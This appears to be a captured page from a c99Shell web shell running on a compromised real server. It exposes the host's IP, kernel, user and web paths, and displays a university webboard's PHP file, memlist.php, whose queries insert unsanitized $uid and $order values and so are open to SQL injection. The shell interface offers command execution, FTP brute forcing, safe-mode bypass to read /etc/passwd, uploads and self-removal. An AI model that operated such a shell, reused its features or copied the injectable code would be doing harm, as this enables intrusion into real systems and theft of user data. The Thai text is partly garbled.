110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/webboard/ drwxr-xr-x Free 52.39 GB of 127.8 GB (41%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/webboard/ drwxr-xr-x
Free 52.39 GB of 127.8 GB (41%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: memlist.php (1.77 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/manage_22222/webboard/memlist.php
Size	1.77 KB
MD5	388fef7c82f0950140f117cef0f4bb87
Owner/Group	root/root
Perms	-rw-r--r--
Create time	06/07/2011 01:44:26
Access time	30/07/2024 13:27:59
MODIFY time	21/08/2009 09:46:55

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318
00000330
00000348
00000360
00000378
00000390
000003A8
000003C0
000003D8
000003F0
00000408
00000420
00000438
00000450
00000468
00000480
00000498
000004B0
000004C8
000004E0
000004F8
00000510
00000528
00000540
00000558
00000570
00000588
000005A0
000005B8
000005D0
000005E8
00000600
00000618
00000630
00000648
00000660
00000678
00000690
000006A8
000006C0
000006D8
000006F0
00000708

20 3C 3F 20 0D 0A 0D 0A 09 72 65 71 75 69 72 65 28 22 63 6F 6E 66 69 67
2E 69 6E 63 2E 70 68 70 22 29 3B 0D 0A 3F 3E 0D 0A 3C 68 74 6D 6C 3E 0D
0A 3C 68 65 61 64 3E 0D 0A 3C 74 69 74 6C 65 3E 42 69 6F 74 65 63 68 6E
6F 6C 6F 67 79 20 4F 66 20 41 73 73 75 6D 70 74 69 6F 6E 20 55 6E 69 76
65 72 73 69 74 79 20 23 33 39 3C 2F 74 69 74 6C 65 3E 0D 0A 3C 2F 68 65
61 64 3E 0D 0A 0D 0A 3C 6C 69 6E 6B 20 68 72 65 66 3D 22 2E 2F 73 74 79
6C 65 2E 63 73 73 22 20 72 65 6C 3D 22 73 74 79 6C 65 73 68 65 65 74 22
20 74 79 70 65 3D 22 74 65 78 74 2F 63 73 73 22 3E 0D 0A 0D 0A 3C 62 6F
64 79 20 62 67 63 6F 6C 6F 72 3D 23 46 46 46 46 45 30 20 62 61 63 6B 67
72 6F 75 6E 64 3D 22 69 6D 67 2F 62 67 32 2E 67 69 66 22 3E 0D 0A 09 3C
66 6F 6E 74 20 73 69 7A 65 3D 32 20 66 61 63 65 3D 22 41 72 69 61 6C 2C
4D 53 20 53 61 6E 73 20 53 65 72 69 66 22 3E 0D 0A 20 20 20 20 0D 0A 0D
0A 3C 2F 66 6F 6E 74 3E 0D 0A 3C 63 65 6E 74 65 72 3E 0D 0A 20 20 3C 66
6F 6E 74 20 73 69 7A 65 3D 33 20 63 6F 6C 6F 72 3D 23 39 34 30 30 44 33
3E 3C 62 3E CA C1 D2 AA D4 A1 E0 C7 E7 BA BA CD C3 EC B4 3C 2F 62 3E 3C
2F 66 6F 6E 74 3E 20 3C 62 72 3E 0D 0A 20 20 3C 62 72 3E 0D 0A 20 20 3C
3F 0D 0A 09 2F 2F 20 B5 C3 C7 A8 CA CD BA C7 E8 D2 C1 D5 20 75 73 65 72
6E 61 6D 65 20 CB C3 D7 CD E4 C1 E8 0D 0A 09 6D 79 73 71 6C 5F 63 6F 6E
6E 65 63 74 28 24 68 6F 73 74 2C 24 75 73 65 72 2C 24 70 61 73 73 77 64
29 3B 0D 0A 09 24 73 71 6C 20 3D 20 22 73 65 6C 65 63 74 20 2A 20 66 72
6F 6D 20 77 65 62 62 6F 61 72 64 5F 6D 65 6D 62 65 72 20 77 68 65 72 65
20 55 73 65 72 3D 27 24 75 69 64 27 22 3B 0D 0A 09 24 72 65 73 75 6C 74
20 3D 20 6D 79 73 71 6C 5F 64 62 5F 71 75 65 72 79 28 24 64 62 6E 61 6D
65 2C 24 73 71 6C 29 3B 0D 0A 09 24 4E 52 6F 77 20 3D 20 6D 79 73 71 6C
5F 6E 75 6D 5F 72 6F 77 73 28 24 72 65 73 75 6C 74 29 3B 0D 0A 0D 0A 09
69 66 28 24 4E 52 6F 77 3D 3D 30 29 20 7B 20 0D 0A 09 09 65 63 68 6F 20
22 45 72 72 6F 72 20 3A 20 55 73 65 72 6E 61 6D 65 20 61 6E 64 20 50 61
73 73 77 6F 72 64 22 2C 22 A1 C3 D8 B3 D2 B5 C3 C7 A8 CA CD BA CD D5 A1
A4 C3 D1 E9 A7 22 2C 22 22 3B 0D 0A 09 09 65 63 68 6F 20 22 3C 62 72 3E
3C 62 72 3E 3C 62 72 3E 3C 62 72 3E 3C 62 72 3E 3C 62 72 3E 3C 62 72 3E
3C 62 72 3E 3C 62 72 3E 5C 6E 22 3B 0D 0A 09 09 65 78 69 74 28 29 3B 20
0D 0A 09 7D 0D 0A 0D 0A 09 24 72 6F 77 20 3D 20 6D 79 73 71 6C 5F 66 65
74 63 68 5F 61 72 72 61 79 28 24 72 65 73 75 6C 74 29 3B 0D 0A 09 24 55
73 65 72 20 3D 20 24 72 6F 77 5B 22 55 73 65 72 22 5D 3B 0D 0A 09 24 50
61 73 73 77 6F 72 64 20 3D 20 24 72 6F 77 5B 22 50 61 73 73 77 6F 72 64
22 5D 3B 0D 0A 09 24 45 6D 61 69 6C 20 3D 20 24 72 6F 77 5B 22 45 6D 61
69 6C 22 5D 3B 0D 0A 09 24 49 43 51 20 3D 20 24 72 6F 77 5B 22 49 43 51
22 5D 3B 0D 0A 09 24 57 65 62 4E 61 6D 65 20 3D 20 24 72 6F 77 5B 22 57
65 62 4E 61 6D 65 22 5D 3B 0D 0A 09 24 55 52 4C 20 3D 20 24 72 6F 77 5B
22 55 52 4C 22 5D 3B 0D 0A 09 24 50 72 6F 66 69 6C 65 20 3D 20 24 72 6F
77 5B 22 50 72 6F 66 69 6C 65 22 5D 3B 0D 0A 09 2F 2F 20 B5 C3 C7 A8 CA
CD BA A1 D2 C3 20 6C 6F 67 69 6E 0D 0A 09 69 66 28 24 61 63 74 69 6F 6E
3D 3D 22 6C 6F 67 69 6E 22 29 20 7B 0D 0A 09 09 69 66 28 24 75 69 64 21
3D 24 55 73 65 72 20 7C 7C 20 24 70 77 64 21 3D 24 50 61 73 73 77 6F 72
64 29 20 7B 0D 0A 09 09 09 65 72 72 5F 6D 73 67 28 22 45 72 72 6F 72 20
3A 20 55 73 65 72 6E 61 6D 65 20 61 6E 64 20 50 61 73 73 77 6F 72 64 22
2C 22 A1 C3 D8 B3 D2 B5 C3 C7 A8 CA CD BA CD D5 A1 A4 C3 D1 E9 A7 22 2C
22 22 29 3B 0D 0A 09 09 7D 0D 0A 09 7D 0D 0A 09 65 6C 73 65 20 7B 0D 0A
09 09 65 63 68 6F 20 22 45 72 72 6F 72 20 3A 20 4D 65 74 68 6F 64 22 2C
22 A1 C3 D8 B3 D2 20 4C 6F 67 69 6E 20 A1 E8 CD B9 E0 A2 E9 D2 C3 D0 BA
BA 22 2C 22 6C 6F 67 69 6E 2E 70 68 70 22 3B 0D 0A 09 7D 0D 0A 0D 0A 3F
3E 0D 0A 0D 0A 20 20 3C 3F 0D 0A 0D 0A 0D 0A 09 24 64 62 20 3D 20 6D 79
73 71 6C 5F 63 6F 6E 6E 65 63 74 28 24 68 6F 73 74 2C 24 75 73 65 72 2C
24 70 61 73 73 77 64 29 20 6F 72 20 64 69 65 20 28 22 E4 C1 E8 CA D2 C1
D2 C3 B6 B5 D4 B4 B5 E8 CD 20 64 61 74 61 62 61 73 65 20 E4 B4 E9 E3 B9
A2 B3 D0 B9 D5 E9 22 29 3B 0D 0A 09 24 74 6F 70 74 65 6E 3D 22 73 65 6C
65 63 74 20 2A 20 66 72 6F 6D 20 77 65 62 62 6F 61 72 64 5F 6D 65 6D 62
65 72 20 6F 72 64 65 72 20 62 79 20 69 64 20 24 6F 72 64 65 72 20 22 3B
20 0D 0A 09 24 72 65 73 75 6C 74 20 3D 20 6D 79 73 71 6C 5F 64 62 5F 71
75 65 72 79 28 24 64 62 6E 61 6D 65 2C 24 74 6F 70 74 65 6E 29 20 6F 72
20 64 69 65 20 28 22 E4 C1 E8 CA D2 C1 D2 C3 B6 CA D1 E8 A7 E3 CB E9 20
64 61 74 61 62 61 73 65 20 B7 D3 A7 D2 B9 E4 B4 E9 E3 B9 A2 B3 D0 B9 D5
E9 22 29 3B 0D 0A 09 24 4E 52 6F 77 20 3D 20 6D 79 73 71 6C 5F 6E 75 6D
5F 72 6F 77 73 28 24 72 65 73 75 6C 74 29 3B 0D 0A 09 0D 0A 09 69 66 20
28 24 4E 52 6F 77 3D 3D 30 29 20 7B 0D 0A 09 09 65 63 68 6F 20 22 C2 D1
A7 E4 C1 E8 C1 D5 CA C1 D2 AA D4 A1 22 3B 0D 0A 09 7D 0D 0A 0D 0A 09 77
68 69 6C 65 28 20 24 61 72 72 20 3D 20 6D 79 73 71 6C 5F 66 65 74 63 68
5F 72 6F 77 28 20 24 72 65 73 75 6C 74 20 29 20 29 20 7B 0D 0A 09 09 09
0D 0A 09 09 0D 0A 09 09 70 72 69 6E 74 20 22 3C 42 52 3E 3C 66 6F 6E 74
20 73 69 7A 65 3D 32 20 66 61 63 65 3D 4D 53 20 53 61 6E 73 20 53 65 72
69 66 3E 24 61 72 72 5B 30 5D 2E 20 3C 61 20 68 72 65 66 3D 27 24 61 72
72 5B 36 5D 27 20 74 61 72 67 65 74 3D 5F 62 6C 61 6E 6B 3E 20 24 61 72
72 5B 31 5D 20 3C 2F 61 3E 20 3A 65 6D 61 69 6C 20 3A 20 24 61 72 72 5B
33 5D 20 20 3A 0D 0A 09 09 3C 62 72 3E 20 0D 0A 09 09 09 20 22 3B 0D 0A
09 09 7D 3B 0D 0A 09 09 6D 79 73 71 6C 5F 63 6C 6F 73 65 28 20 24 64 62
20 29 3B 0D 0A 0D 0A 20 3F 3E 0D 0A

<? require("config
.inc.php"); ?> <html>
<head> <title>Biotechn
ology Of Assumption Univ
ersity #39</title> </he
ad> <link href="./sty
le.css" rel="stylesheet"
type="text/css"> <bo
dy bgcolor=#FFFFE0 backg
round="img/bg2.gif"> 
 <center> <f
ont size=3 color=#9400D3
>КБТЄФЎаЗзєєНГмґ <
? // µГЗЁКНєЗиТБХ user
name ЛГЧНдБи mysql_con
nect($host,$user,$passwd
); $sql = "select * fr
om webboard_member where
User='$uid'"; $result
= mysql_db_query($dbnam
e,$sql); $NRow = mysql
_num_rows($result);
if($NRow==0) { echo
"Error : Username and Pa
ssword","ЎГШіТµГЗЁКНєНХЎ
¤ГСй§",""; echo " 
 
 \n"; exit();
 } $row = mysql_fe
tch_array($result); $U
ser = $row["User"]; $P
assword = $row["Password
"]; $Email = $row["Ema
il"]; $ICQ = $row["ICQ
"]; $WebName = $row["W
ebName"]; $URL = $row[
"URL"]; $Profile = $ro
w["Profile"]; // µГЗЁК
НєЎТГ login if($action
=="login") { if($uid!
=$User || $pwd!=$Passwor
d) { err_msg("Error
: Username and Password"
,"ЎГШіТµГЗЁКНєНХЎ¤ГСй§",
""); } } else {
echo "Error : Method",
"ЎГШіТ Login ЎиН№аўйТГРє
є","login.php"; } ?
> <? $db = my
sql_connect($host,$user,
$passwd) or die ("дБиКТБ
ТГ¶µФґµиН database дґйг№
ўіР№Хй"); $topten="sel
ect * from webboard_memb
er order by id $order ";
 $result = mysql_db_q
uery($dbname,$topten) or
die ("дБиКТБТГ¶КСи§гЛй
database ·У§Т№дґйг№ўіР№Х
й"); $NRow = mysql_num
_rows($result); if
($NRow==0) { echo "ВС
§дБиБХКБТЄФЎ"; } w
hile( $arr = mysql_fetch
_row( $result ) ) {
 print " $arr[0]. <a href='$ar
r[6]' target=_blank> $ar
r[1] </a> :email : $arr[
3] : ";
}; mysql_close( $db
); ?>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0122 ]--